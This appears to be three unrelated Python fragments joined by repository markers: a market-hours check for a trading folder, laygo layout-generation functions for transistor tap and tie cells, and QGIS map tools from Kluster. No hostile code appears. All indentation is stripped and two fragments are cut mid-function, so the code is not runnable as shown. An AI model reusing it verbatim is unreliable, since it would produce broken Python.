begin = d['open']
weekno = datetime.datetime.today().weekday()
ct = datetime.datetime.now().time()
bt = ct
if (begin is not None):
if "AM" in begin or "PM" in begin:
bt = datetime.datetime.strptime(begin, '%I:%M%p').time()
else:
bt = datetime.datetime.strptime(begin, '%H:%M').time()
if weekno < 5 and ct > bt:
answer = True
return answer
def DayisClosed(verbose):
answer = False
d, t = GetDefaults(verbose)
ct = datetime.datetime.now().time()
if "close" in d:
end = d['close']
et = ct
if (end is not None):
if "AM" in end or "PM" in end:
et = datetime.datetime.strptime(end, '%I:%M%p').time()
else:
et = datetime.datetime.strptime(end, '%H:%M').time()
if ct > et:
folder = GetFolder(verbose)
if folder != []:
answer = True
for item in folder:
if item['symbol'] != "$":
if (item['quote'] != "close"):
answer = False
break
return answer
def GetFolderCash(verbose):
folder = GetFolder(verbose)
answer = 0
| |
<reponame>xyabc/laygo_obsolete
#!/usr/bin/python
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
"""Logic layout
"""
import laygo
import numpy as np
import yaml
import os
#import logging;logging.basicConfig(level=logging.DEBUG)
def create_io_pin(laygen, layer, gridname, pinname_list, rect_list, offset_y=np.array([-1, 1])):
"""create digital io pin"""
rect_xy_list = [laygen.get_rect_xy(name=r.name, gridname=gridname, sort=True) for r in rect_list]
#align pins
ry = rect_xy_list[0][:, 1] + offset_y.T
for i, xy_rect in enumerate(rect_xy_list):
xy_rect[:, 1]=ry
laygen.pin(name=pinname_list[i], layer=layer, xy=xy_rect, gridname=gridname)
def create_power_pin(laygen, layer, gridname, rect_vdd, rect_vss):
"""create power pin"""
rvdd_pin_xy = laygen.get_rect_xy(rect_vdd.name, gridname)
rvss_pin_xy = laygen.get_rect_xy(rect_vss.name, gridname)
laygen.pin(name='VDD', layer=layer, xy=rvdd_pin_xy, gridname=gridname)
laygen.pin(name='VSS', layer=layer, xy=rvss_pin_xy, gridname=gridname)
def generate_space_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False):
pg = placement_grid
rg_m1m2=routing_grid_m1m2
# placement
in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space', pg, xy=origin)
ip0 = laygen.relplace("I"+objectname_pfix + 'P0', 'pmos4_fast_space', pg, in0.name, direction='top', transform='MX')
# power and groud rail
xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
# power pin
if create_pin==True:
rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_space_2x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False):
pg = placement_grid
rg_m1m2=routing_grid_m1m2
# placement
in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf2', pg, xy=origin)
ip0 = laygen.relplace("I"+objectname_pfix + 'P0', 'pmos4_fast_space_nf2', pg, in0.name, direction='top', transform='MX')
# power and groud rail
xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
# power pin
if create_pin==True:
rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_space_4x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False):
pg = placement_grid
rg_m1m2=routing_grid_m1m2
# placement
in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf4', pg, xy=origin)
ip0 = laygen.relplace("I"+objectname_pfix + 'P0', 'pmos4_fast_space_nf4', pg, in0.name, direction='top', transform='MX')
# power and groud rail
xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
# power pin
if create_pin==True:
rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2,
devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False):
pg = placement_grid
rg_m1m2=routing_grid_m1m2
# placement
in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin)
ip0 = laygen.relplace("I"+objectname_pfix + 'P0', devname_pmos_tap, pg, in0.name, direction='top', transform='MX')
#tap route
xy_tap0 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
xy_tap1 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
# power and groud rail
xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
# power pin
if create_pin==True:
rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_plugged_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2,
devname_nmos_tap, devname_pmos_tap, devname_plug, origin=np.array([0, 0]), create_pin=False):
pg = placement_grid
rg_m1m2=routing_grid_m1m2
# placement
in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin)
iplug0 = laygen.place("I"+objectname_pfix + 'PLUG0', devname_plug, pg, xy=origin)
ip0 = laygen.relplace("I"+objectname_pfix + 'P0', devname_pmos_tap, pg, in0.name, direction='top', transform='MX')
#tap route
xy_tap0 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
xy_tap1 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
# power and groud rail
xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip0.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in0.name)
# power pin
if create_pin==True:
rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_tie(laygen, objectname_pfix,
placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin,
devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body,
m=1, origin=np.array([0,0]), create_pin=False):
pg = placement_grid
rg_m1m2 = routing_grid_m1m2
rg_m2m3 = routing_grid_m2m3
rg_m1m2_pin = routing_grid_m1m2_pin
rg_m2m3_pin = routing_grid_m2m3_pin
m=max(1, int(m/2)) #using nf=2 devices
# placement
in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin)
in1 = laygen.relplace("I"+objectname_pfix+'N1', devname_nmos_body, pg, in0.name, shape=np.array([m, 1]))
in2 = laygen.relplace("I"+objectname_pfix+'N2', devname_nmos_boundary, pg, in1.name)
ip0 = laygen.relplace("I"+objectname_pfix+'P0', devname_pmos_boundary, pg, in0.name, direction='top', transform='MX')
ip1 = laygen.relplace("I"+objectname_pfix+'P1', devname_pmos_body, pg, ip0.name, transform='MX', shape=np.array([m, 1]))
ip2 = laygen.relplace("I"+objectname_pfix+'P3', devname_pmos_boundary, pg, ip1.name, transform='MX')
# route
# horizontal route style
# input
for i in range(m):
laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]),
)
laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([i, 0]),
)
# vdd/vss
if m==1:
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]),
)
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]),
)
else:
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
for i in range(m):
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]),
gridname=rg_m1m2)
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([m-1, 0]),
gridname=rg_m2m3)
laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]),
gridname=rg_m2m3)
rvss = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]),
refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0]))
rvdd = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3,
refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]),
refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
#align output to input pin
# power and groud rail
xy = laygen.get_template_size(in2.cellname, rg_m1m2) * np.array([1, 0])
laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=ip0.name, refinstname1=ip2.name)
laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
refinstname0=in0.name, refinstname1=in2.name)
# power and ground route
xy_s0 = laygen.get_template_pin_coord(in1.cellname, 'S0', rg_m1m2)[0, :]
for i in range(m):
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
refinstname0=in1.name, refinstindex0=np.array([i, 0]),
refinstname1=in1.name, refinstindex1=np.array([i, 0]))
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2,
refinstname0=ip1.name, refinstindex0=np.array([i, 0]),
refinstname1=ip1.name, refinstindex1=np.array([i, 0]))
laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0]))
laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0]))
xy_s1 = laygen.get_template_pin_coord(in1.cellname, 'S1', rg_m1m2)[0, :]
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
refinstname0=in1.name, refinstindex0=np.array([m-1, 0]),
refinstname1=in1.name, refinstindex1=np.array([m-1, 0]))
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2,
refinstname0=ip1.name, refinstindex0=np.array([m-1, 0]),
refinstname1=ip1.name, refinstindex1=np.array([m-1, 0]))
laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0]))
laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0]))
# pin
rvdd0_pin_xy = laygen.get_rect_xy(rvdd.name, rg_m2m3_pin, sort=True)
rvss0_pin_xy = laygen.get_rect_xy(rvss.name, rg_m2m3_pin, sort=True)
rvdd0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1
rvdd0_pin_xy[1][1] = | |
<filename>HSTB/kluster/gui/backends/_qgis.py
import os, sys
import numpy as np
from typing import Union
from pyproj import CRS
from osgeo import gdal
from HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal, qgis_enabled, found_path
if not qgis_enabled:
raise EnvironmentError('Unable to find qgis directory in {}'.format(found_path))
from HSTB.kluster.gui.backends._qt import qgis_core, qgis_gui
from HSTB.kluster import __file__ as klusterdir
from HSTB.kluster.gdal_helpers import gdal_raster_create, VectorLayer, gdal_output_file_exists, ogr_output_file_exists
from HSTB.kluster import kluster_variables
class DistanceTool(qgis_gui.QgsMapTool):
"""
Render a green line and give distance from start to end point using the WGS84 ellipsoid curvature. Each click
resets the map tool. Distance is given in meters (if the tool finds a different unit is being provided, it raises
an exception as I think that might be indicative of an issue with the ellipsoid set.
"""
def __init__(self, canvas):
self.canvas = canvas
qgis_gui.QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = qgis_gui.QgsRubberBand(self.canvas, True)
self.rubberBand.setColor(QtCore.Qt.darkGreen)
self.rubberBand.setFillColor(QtCore.Qt.transparent)
self.rubberBand.setWidth(4)
self.start_point = None
self.end_point = None
self.reset()
def reset(self):
"""
Clear the line
"""
self.start_point = None
self.end_point = None
self.rubberBand.reset(qgis_core.QgsWkbTypes.LineGeometry)
def canvasPressEvent(self, e):
"""
Start a new line
"""
self.start_point = self.toMapCoordinates(e.pos())
self.end_point = self.start_point
self.showLine(self.start_point, self.end_point)
def canvasReleaseEvent(self, e):
"""
Finish the line on releasing the mouse. If the start and end point are the same, it just resets. Otherwise
prints the distance in meters.
"""
l = self.line()
if l is not None:
distance = qgis_core.QgsDistanceArea()
distance.setEllipsoid('WGS84')
m = distance.measureLine(self.start_point, self.end_point)
units_enum = distance.lengthUnits()
if units_enum != 0:
raise ValueError('Something wrong with the distance units, got {} instead of 0=meters'.format(units_enum))
print('******************************************************')
print('Distance of {} meters'.format(round(m, 3)))
print('******************************************************')
self.start_point = None
else:
self.reset()
def canvasMoveEvent(self, e):
"""
Mouse movement resets and shows the new line where the end point is the current mouse position
"""
if self.start_point is None:
return
self.end_point = self.toMapCoordinates(e.pos())
self.showLine(self.start_point, self.end_point)
def showLine(self, start_point: qgis_core.QgsPoint, end_point: qgis_core.QgsPoint):
"""
Show the rubberband object from the provided start point to the end point.
Parameters
----------
start_point
QgsPoint for the start of the line
end_point
QgsPoint for the end of the line
"""
self.rubberBand.reset(qgis_core.QgsWkbTypes.LineGeometry)
if start_point.x() == end_point.x() or start_point.y() == end_point.y():
return
point1 = qgis_core.QgsPointXY(start_point.x(), start_point.y())
point2 = qgis_core.QgsPointXY(end_point.x(), end_point.y())
self.rubberBand.addPoint(point1, False)
self.rubberBand.addPoint(point2, True)
self.rubberBand.show()
def line(self):
"""
Return the linestring if the start and end points are valid
"""
if self.start_point is None or self.end_point is None:
return None
elif self.start_point.x() == self.end_point.x() or self.start_point.y() == self.end_point.y():
return None
return qgis_core.QgsLineString(self.start_point, self.end_point)
def deactivate(self):
"""
Turn the tool off, make sure to clear the rubberband as well
"""
self.reset()
qgis_gui.QgsMapTool.deactivate(self)
self.deactivated.emit()
class QueryTool(qgis_gui.QgsMapTool):
"""
Get the value for all raster layers loaded at the mouse position. We filter out vector layers and any loaded
WMS background layers. Should just get surface layers
"""
def __init__(self, parent):
self.parent = parent
qgis_gui.QgsMapTool.__init__(self, self.parent.canvas)
def canvasPressEvent(self, e):
"""
On press we print out the tooltip text to the stdout
"""
text = self._get_cursor_data(e)
print('******************************************************')
print(text)
print('******************************************************')
def canvasMoveEvent(self, e):
"""
On moving the mouse, we get the new raster information at mouse position and show a new tooltip
"""
text = self._get_cursor_data(e)
QtWidgets.QToolTip.showText(self.parent.canvas.mapToGlobal(self.parent.canvas.mouseLastXY()), text,
self.parent.canvas, QtCore.QRect(), 1000000)
def deactivate(self):
"""
Deactivate the tool
"""
qgis_gui.QgsMapTool.deactivate(self)
self.deactivated.emit()
def _get_cursor_data(self, e):
"""
Get the mouse position, transform it to the map coordinates, build the text that feeds the tooltip and the
print on mouseclick event. Only query non-WMS raster layers. WMS is background stuff, we don't care about those
values. If the raster layer is a virtual file system object (vsimem) we trim that part of the path off for display.
"""
x = e.pos().x()
y = e.pos().y()
point = self.parent.canvas.getCoordinateTransform().toMapCoordinates(x, y)
text = 'Latitude: {}, Longitude: {}'.format(round(point.y(), 7), round(point.x(), 7))
for name, layer in self.parent.project.mapLayers().items():
if layer.type() == qgis_core.QgsMapLayerType.RasterLayer:
if layer.dataProvider().name() != 'wms':
try:
layer_point = self.parent.map_point_to_layer_point(layer, point)
ident = layer.dataProvider().identify(layer_point, qgis_core.QgsRaster.IdentifyFormatValue)
if ident:
lname = layer.name()
if lname[0:8] == '/vsimem/':
lname = lname[8:]
text += '\n\n{}'.format(lname)
for ky, val in ident.results().items():
text += '\n{}: {}'.format(layer.bandName(ky), round(val, 3))
except: # point is outside of the transform
pass
return text
class SelectTool(qgis_gui.QgsMapToolEmitPoint):
"""
Allow the user to drag select a box and this tool will emit the corner coordinates using the select Signal. We use
this in Kluster to select lines.
"""
# minlat, maxlat, minlon, maxlon in Map coordinates (WGS84 for Kluster)
select = Signal(float, float, float, float)
def __init__(self, canvas):
self.canvas = canvas
qgis_gui.QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = qgis_gui.QgsRubberBand(self.canvas, True)
self.rubberBand.setColor(QtCore.Qt.transparent)
self.rubberBand.setFillColor(QtGui.QColor(0, 0, 255, 50))
self.start_point = None
self.end_point = None
self.reset()
def reset(self):
"""
Clear the rubberband obj and points
"""
self.start_point = None
self.end_point = None
self.isEmittingPoint = False
self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)
def canvasPressEvent(self, e):
"""
Set the start position of the rectangle on click
"""
self.start_point = self.toMapCoordinates(e.pos())
self.end_point = self.start_point
self.isEmittingPoint = True
self.showRect(self.start_point, self.end_point)
def canvasReleaseEvent(self, e):
"""
Finish the rectangle and emit the corner coordinates in map coordinate system
"""
self.isEmittingPoint = False
r = self.rectangle()
if r is not None:
self.select.emit(r.yMinimum(), r.yMaximum(), r.xMinimum(), r.xMaximum())
self.reset()
def canvasMoveEvent(self, e):
"""
On move update the rectangle
"""
if not self.isEmittingPoint:
return
self.end_point = self.toMapCoordinates(e.pos())
self.showRect(self.start_point, self.end_point)
def showRect(self, start_point: qgis_core.QgsPoint, end_point: qgis_core.QgsPoint):
"""
Show the rubberband object from the provided start point to the end point. Clear out any existing rect.
Parameters
----------
start_point
QgsPoint for the start of the rect
end_point
QgsPoint for the end of the rect
"""
self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)
if start_point.x() == end_point.x() or start_point.y() == end_point.y():
return
point1 = qgis_core.QgsPointXY(start_point.x(), start_point.y())
point2 = qgis_core.QgsPointXY(start_point.x(), end_point.y())
point3 = qgis_core.QgsPointXY(end_point.x(), end_point.y())
point4 = qgis_core.QgsPointXY(end_point.x(), start_point.y())
self.rubberBand.addPoint(point1, False)
self.rubberBand.addPoint(point2, False)
self.rubberBand.addPoint(point3, False)
self.rubberBand.addPoint(point4, True) # true to update canvas
self.rubberBand.show()
def rectangle(self):
"""
Return the QgsRectangle object for the drawn start/end points
"""
if self.start_point is None or self.end_point is None:
return None
elif self.start_point.x() == self.end_point.x() or self.start_point.y() == self.end_point.y():
return None
return qgis_core.QgsRectangle(self.start_point, self.end_point)
def deactivate(self):
"""
Turn off the tool
"""
qgis_gui.QgsMapTool.deactivate(self)
self.deactivated.emit()
class RectangleMapTool(qgis_gui.QgsMapToolEmitPoint):
"""
Draw a persistent black rectangle on the screen and emit the coordinates for the rect in map coordinate system.
"""
# minlat, maxlat, minlon, maxlon in Map coordinates (WGS84 for Kluster)
select = Signal(float, float, float, float)
def __init__(self, canvas):
self.canvas = canvas
qgis_gui.QgsMapToolEmitPoint.__init__(self, self.canvas)
self.rubberBand = qgis_gui.QgsRubberBand(self.canvas, True)
self.rubberBand.setColor(QtCore.Qt.black)
self.rubberBand.setFillColor(QtCore.Qt.transparent)
self.rubberBand.setWidth(1)
self.start_point = None
self.end_point = None
self.reset()
def reset(self):
"""
Clear the rectangle
"""
self.start_point = None
self.end_point = None
self.isEmittingPoint = False
self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)
def canvasPressEvent(self, e):
"""
Lay down the start point of the rectangle and reset the end point to the start point.
"""
self.start_point = self.toMapCoordinates(e.pos())
self.end_point = self.start_point
self.isEmittingPoint = True
self.showRect(self.start_point, self.end_point)
def canvasReleaseEvent(self, e):
"""
On release we emit the corner coordinates of the rectangle and anchor the drawing to the screen
"""
self.isEmittingPoint = False
r = self.rectangle()
if r is not None:
self.select.emit(r.yMinimum(), r.yMaximum(), r.xMinimum(), r.xMaximum())
def canvasMoveEvent(self, e):
"""
On moving the mouse cursor, the rectangle continuously updates
"""
if not self.isEmittingPoint:
return
self.end_point = self.toMapCoordinates(e.pos())
self.showRect(self.start_point, self.end_point)
def showRect(self, start_point: qgis_core.QgsPoint, end_point: qgis_core.QgsPoint):
"""
Show the rubberband object from the provided start point to the end point. Clear out any existing rect.
Parameters
----------
start_point
QgsPoint for the start of the rect
end_point
QgsPoint for the end of the rect
"""
self.rubberBand.reset(qgis_core.QgsWkbTypes.PolygonGeometry)
if start_point.x() == end_point.x() or start_point.y() == end_point.y():
return
point1 = qgis_core.QgsPointXY(start_point.x(), start_point.y())
point2 = qgis_core.QgsPointXY(start_point.x(), end_point.y())
point3 = qgis_core.QgsPointXY(end_point.x(), end_point.y())
point4 = qgis_core.QgsPointXY(end_point.x(), start_point.y())
self.rubberBand.addPoint(point1, False)
self.rubberBand.addPoint(point2, False)
self.rubberBand.addPoint(point3, False)
self.rubberBand.addPoint(point4, True) # true to update canvas
self.rubberBand.show()
def rectangle(self):
"""
Return the QgsRectangle object for the drawn start/end points
"""
if self.start_point is None or self.end_point is None:
return None
elif self.start_point.x() == self.end_point.x() or self.start_point.y() == self.end_point.y():
return None
return qgis_core.QgsRectangle(self.start_point, self.end_point)
def deactivate(self):
"""
Deactivate the map tool
"""
